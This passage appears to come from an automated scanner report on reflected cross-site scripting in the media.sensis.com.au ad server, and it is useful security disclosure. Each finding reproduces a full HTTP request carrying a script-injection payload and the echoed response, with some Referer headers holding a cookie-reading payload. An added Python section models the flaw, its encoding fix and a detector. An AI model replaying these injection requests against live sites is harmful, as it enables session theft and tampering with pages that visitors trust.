2.591. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f17"><script>alert(1)</script>0d32a448396 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691?a8f17"><script>alert(1)</script>0d32a448396=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/bphf/header/adh.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:47 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 482
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=00097CA7312F0CEB2E17914661626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000308680000000000000000/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691?a8f17"><script>alert(1)</script>0d32a448396=1&relocate=http://clk.redcated/OMA/go/255858459/direct/01/" target="_blank">
...[SNIP]...

2.592. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce0c4"><script>alert(1)</script>754400e4bcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverce0c4"><script>alert(1)</script>754400e4bcd/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:42 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000ce0c4"><script>alert(1)</script>754400e4bcd/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.593. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3fe3"><script>alert(1)</script>7dc6c83e7d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomb3fe3"><script>alert(1)</script>7dc6c83e7d1=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:43 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000/acc_randomb3fe3"><script>alert(1)</script>7dc6c83e7d1=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.594. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6512d"><script>alert(1)</script>1eb016faed5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?6512d"><script>alert(1)</script>1eb016faed5=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:41 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 514
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?6512d"><script>alert(1)</script>1eb016faed5=1" target="_new">
...[SNIP]...

2.595. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22575"><script>alert(1)</script>bedb98fa2c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver22575"><script>alert(1)</script>bedb98fa2c8/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:53 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 693
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a96000000000000000022575"><script>alert(1)</script>bedb98fa2c8/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588/relocate=http://bs.serving-sys.
...[SNIP]...

2.596. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38329"><script>alert(1)</script>a73b3923879 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random38329"><script>alert(1)</script>a73b3923879=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:13:04 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 467
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_random38329"><script>alert(1)</script>a73b3923879=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588/relocate=http://clk.redcated/OMA/go/27018
...[SNIP]...

2.597. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abcb"><script>alert(1)</script>46cce4301c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588?4abcb"><script>alert(1)</script>46cce4301c3=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:52 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 696
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a960000000000000000/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588?4abcb"><script>alert(1)</script>46cce4301c3=1&relocate=http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2005956&PluID=0&ord=312042836869" target="_blank">
...[SNIP]...
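
Findings 2.586 through 2.597 above are one pattern seen twelve times: the ad server copies part of the request path (or the name of an arbitrary query parameter) into the double-quoted href of the ADCLICK anchor without encoding it, so a quote followed by a closing angle bracket ends the attribute and the tag, and the rest of the path is parsed as markup. The following is an added example written for this report, not code from the report or from the ad server vendor. It rebuilds the response of 2.586 from that finding's request path under the assumption that the server simply appends everything after "/hserver" to the click URL, checks that model against the captured response line, shows the encoding a fix would apply (percent-encode the echoed path, then HTML attribute-encode the whole href), and uses Python's HTML tokenizer to confirm that only the unencoded version produces a script element. The click_url() model, and the decision to percent-encode with "/", "=" and "." left intact, are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote

# Values copied from finding 2.586 above: the request path carrying the
# scanner's payload, the CID the server prepended, and the response line.
REQUEST_PATH = ('/hservere9827"><script>alert(1)</script>4e5c52ad3d3'
                '/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING'
                '/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS'
                '/POSITION=ABV1/pageid=254201693891')
CID = '000050d3a649cbdb00000000'
CAPTURED_RESPONSE = (
    '<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a649cbdb00000000'
    'e9827"><script>alert(1)</script>4e5c52ad3d3/acc_random=113168337601'
    '/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1'
    '/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1'
    '/pageid=254201693891" target="_new">')


def click_url(request_path: str) -> str:
    """Model of the observed behaviour (an assumption, not the vendor's code):
    drop the '/hserver' prefix and append the rest of the request path to the
    ADCLICK URL verbatim."""
    return ('http://media.sensis.com.au/ADCLICK/CID=' + CID
            + request_path[len('/hserver'):])


def render_vulnerable(request_path: str) -> str:
    """Reproduces the captured response: the URL goes into href unencoded."""
    return '<a href="' + click_url(request_path) + '" target="_new">'


def render_hardened(request_path: str) -> str:
    """Two independent layers: percent-encode the echoed path so it is a
    valid URL containing no raw '"', '<' or '>', then attribute-encode the
    whole value so even a stray quote could not close the attribute."""
    url = click_url(quote(request_path, safe='/=.'))
    return '<a href="' + escape(url, quote=True) + '" target="_new">'


class TagCollector(HTMLParser):
    """Records every start tag and its attributes in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(html: str) -> list:
    """Return [(tag, {attr: value}), ...] as the HTML tokenizer sees them."""
    parser = TagCollector()
    parser.feed(html)
    parser.close()
    return parser.tags


def breaks_out(html: str) -> bool:
    """True when the reflected input produced a tag of its own: the template
    is meant to emit exactly one <a>, so any other start tag means the
    payload escaped the attribute value."""
    return any(tag != 'a' for tag, _ in start_tags(html))


def model_matches_capture() -> bool:
    """Sanity check of the server model against the response in the report."""
    return render_vulnerable(REQUEST_PATH) == CAPTURED_RESPONSE


if __name__ == '__main__':
    print('model matches captured response:', model_matches_capture())
    print('vulnerable breaks out:', breaks_out(render_vulnerable(REQUEST_PATH)))
    print('hardened breaks out:  ', breaks_out(render_hardened(REQUEST_PATH)))
    print(render_hardened(REQUEST_PATH))
```

The detector tokenizes rather than string-matches: the scanner's marker text appears in both outputs, but only the unencoded one yields a second start tag, which is the condition a browser would act on. To re-run the check against any other finding in the series, substitute that request's path and the CID from its response; the same two-layer encoding closes all twelve, because each one is a raw copy of request data into the same attribute.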

2.598. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dcb7"><script>alert(1)</script>de5f006c4b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver8dcb7"><script>alert(1)</script>de5f006c4b4/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:17 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 469
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=00084B6131110CEB7467A4E961626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c00000000000000008dcb7"><script>alert(1)</script>de5f006c4b4/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415/relocate=http://clk.redcated
...[SNIP]...

2.599. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fefb4"><script>alert(1)</script>ced29f7a466 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomfefb4"><script>alert(1)</script>ced29f7a466=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
